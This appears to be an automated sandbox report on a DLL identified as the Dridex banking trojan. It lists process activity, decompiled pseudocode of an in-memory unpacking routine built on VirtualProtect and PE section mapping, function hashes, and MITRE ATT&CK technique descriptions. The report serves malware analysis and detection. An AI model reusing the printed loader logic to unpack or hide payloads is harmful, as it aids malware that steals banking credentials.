API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 674f4fbfa8e6bbf0f83e0f662fc9a468d5d72d2a940663443eb1bb25f7819f85
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 0141C5B5E0421A9FDB04DFA8C4906AEBBF1FF88324F15856DE848AB340D375A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6296 Parent PID: 5868 rundll32.exeCOMMON

Executed Functions

Function 03222062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E03222062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x3224418 = 1;
				asm("movaps xmm0, [0x3223010]");
				asm("movups [0x3224428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E032226BF();
				E032223B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E032226BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E032226BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x3224418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x0322206e
0x0322207c
0x03222083
0x03222086
0x03222090
0x03222097
0x032220a1
0x032220a7
0x032220b0
0x032220b9
0x032220bc
0x032220c2
0x032220c6
0x032220ce
0x032220d5
0x032220d8
0x032220db
0x032220de
0x032220e1
0x032220fb
0x03222101
0x03222104
0x0322210c
0x03222110
0x03222113
0x03222116
0x03222119
0x0322211c
0x03222138
0x03222155
0x0322217a
0x0322217c
0x03222185
0x03222188
0x03222192
0x03222195
0x03222198
0x0322219b
0x0322219e
0x0322236f
0x0322236f
0x032222ce
0x032222d4
0x032221a9
0x032221b7
0x032221bf
0x032221c2
0x032221c4
0x032221ca
0x032221d6
0x032221d9
0x032221dc
0x032221df
0x032223b1
0x032223b1
0x032222ef
0x032222f5
0x032222fb
0x03222301
0x03222307
0x0322230d
0x03222313
0x03222316
0x03222319
0x03222321
0x03222329
0x0322232f
0x03222335
0x0322233b
0x03222341
0x0322234f
0x032222bb
0x032222c1
0x032222c1
0x032222da
0x0322238e
0x03222394
0x032221ea
0x032221ea
0x03222204
0x03222229
0x03222238
0x0322223b
0x0322223f
0x03222243
0x0322224a
0x03222250
0x03222252
0x0322225b
0x0322226c
0x03222272
0x03222278
0x0322227b
0x00000000
0x00000000
0x03222281
0x00000000
0x032221ea
0x032222aa

APIs

VirtualProtect.KERNELBASE ref: 032220E1
VirtualProtect.KERNELBASE ref: 0322217A

Strings

\, xrefs: 03222321

Memory Dump Source

Source File: 0000000C.00000002.691014512.0000000003220000.00000040.00000010.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: c9803c4ca9951df1a65740d0ebcb6072f4610fafaa98e50a296532afc21ebc0f
Instruction ID: e3161c830728c4f5b2ebd2ff5782d2a4b7959920919ca567e3f4d53d166da1e3
Opcode Fuzzy Hash: c9803c4ca9951df1a65740d0ebcb6072f4610fafaa98e50a296532afc21ebc0f
Instruction Fuzzy Hash: C791BAB4E10318DFCB54DF98C980A9DBBF0BF48300F25856AE958AB351D335A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 032221EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 03222250

Strings

\, xrefs: 03222321

Memory Dump Source

Source File: 0000000C.00000002.691014512.0000000003220000.00000040.00000010.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 1cbb2e71bdeb12e65798b180a13321d69a110d2f6729f950cb8bf10032f9f461
Instruction ID: a1300307726a10c1245bdb77982c825f6d2f505639e9d9b1bc7858bfa07aa5f0
Opcode Fuzzy Hash: 1cbb2e71bdeb12e65798b180a13321d69a110d2f6729f950cb8bf10032f9f461
Instruction Fuzzy Hash: D951AEB5E10229DFCB24CF59C980A9DBBF1BF88310F2585A9D958A7311D731A991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03221E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 03221F29

Memory Dump Source

Source File: 0000000C.00000002.691014512.0000000003220000.00000040.00000010.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 4679b1bc37743993ca4a19f45fac50255a9d629ac39de7f0729b7e5820ea2689
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 7541C5B5E142199FDB04DF98C890AAEBBF1FF48310F15856DE448AB340D775A851CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2944 Parent PID: 5868 rundll32.exeCOMMON

Executed Functions

Function 003B2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E003B2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x3b4418 = 1;
				asm("movaps xmm0, [0x3b3010]");
				asm("movups [0x3b4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E003B26BF();
				E003B23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E003B26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E003B26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x3b4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x003b206e
0x003b207c
0x003b2083
0x003b2086
0x003b2090
0x003b2097
0x003b20a1
0x003b20a7
0x003b20b0
0x003b20b9
0x003b20bc
0x003b20c2
0x003b20c6
0x003b20ce
0x003b20d5
0x003b20d8
0x003b20db
0x003b20de
0x003b20e1
0x003b20fb
0x003b2101
0x003b2104
0x003b210c
0x003b2110
0x003b2113
0x003b2116
0x003b2119
0x003b211c
0x003b2138
0x003b2155
0x003b217a
0x003b217c
0x003b2185
0x003b2188
0x003b2192
0x003b2195
0x003b2198
0x003b219b
0x003b219e
0x003b236f
0x003b236f
0x003b22ce
0x003b22d4
0x003b21a9
0x003b21b7
0x003b21bf
0x003b21c2
0x003b21c4
0x003b21ca
0x003b21d6
0x003b21d9
0x003b21dc
0x003b21df
0x003b23b1
0x003b23b1
0x003b22ef
0x003b22f5
0x003b22fb
0x003b2301
0x003b2307
0x003b230d
0x003b2313
0x003b2316
0x003b2319
0x003b2321
0x003b2329
0x003b232f
0x003b2335
0x003b233b
0x003b2341
0x003b234f
0x003b22bb
0x003b22c1
0x003b22c1
0x003b22da
0x003b238e
0x003b2394
0x003b21ea
0x003b21ea
0x003b2204
0x003b2229
0x003b2238
0x003b223b
0x003b223f
0x003b2243
0x003b224a
0x003b2250
0x003b2252
0x003b225b
0x003b226c
0x003b2272
0x003b2278
0x003b227b
0x00000000
0x00000000
0x003b2281
0x00000000
0x003b21ea
0x003b22aa

APIs

VirtualProtect.KERNELBASE ref: 003B20E1
VirtualProtect.KERNELBASE ref: 003B217A

Strings

\, xrefs: 003B2321

Memory Dump Source

Source File: 0000000D.00000002.685749779.00000000003B0000.00000040.00000010.sdmp, Offset: 003B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 498bb583cac9d0e16a7b6ed0a67773e84e85e24d0c6e81653936a6adc6d1ee18
Instruction ID: 96baa0ee21f3ab3a9fd4c5b0bfd2ce4c618a4f96f22307719b07f97dd8f83d7b
Opcode Fuzzy Hash: 498bb583cac9d0e16a7b6ed0a67773e84e85e24d0c6e81653936a6adc6d1ee18
Instruction Fuzzy Hash: ED91BFB4D042188FDB04DF99C580A9EFBF1FF48314F25856AEA58AB752D334A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 003B21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 003B2250

Strings

\, xrefs: 003B2321

Memory Dump Source

Source File: 0000000D.00000002.685749779.00000000003B0000.00000040.00000010.sdmp, Offset: 003B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 378b555d28608614eeaa80c6703b645b6d9cbd8c2065d33c149c0fc992001437
Instruction ID: a67afcb6146eac97da46eca9596d0a05ed6b03b5261a1ba6ebfb808061ac89ae
Opcode Fuzzy Hash: 378b555d28608614eeaa80c6703b645b6d9cbd8c2065d33c149c0fc992001437
Instruction Fuzzy Hash: 2A51C2B5E002298FCB14CF59C980A9DFBF1BF48314F2686A9DA58A7711D730AD91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003B1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 003B1F29

Memory Dump Source

Source File: 0000000D.00000002.685749779.00000000003B0000.00000040.00000010.sdmp, Offset: 003B0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 38aca81c6fe2b7c8dc4656c423c867ee0ce2cb0f1976de5d95b84a9f653f69c9
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 4941D1B1E0421A8FDB04DFA8C4906AEBBF1FF48314F19856AE948AB741D375A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 5868 Parent PID: 3576

General

Function 007B2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Function 6E8B1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E8C0754, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 650
COMMONCrypto

Function 6E8C223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E8C2840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E8C3110, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6E8C10C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E8C578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E8C5B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6E8C5B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E8C5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E8C5BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E8C5B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E8C5BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E8C5DE8, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E8C5624, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E8C5E5C, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6E8C1054, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E8C3600, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E8B6D50, Relevance: .0, Instructions: 36
COMMON

Function 6E8BBB88, Relevance: .0, Instructions: 16
COMMON

Function 033A2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON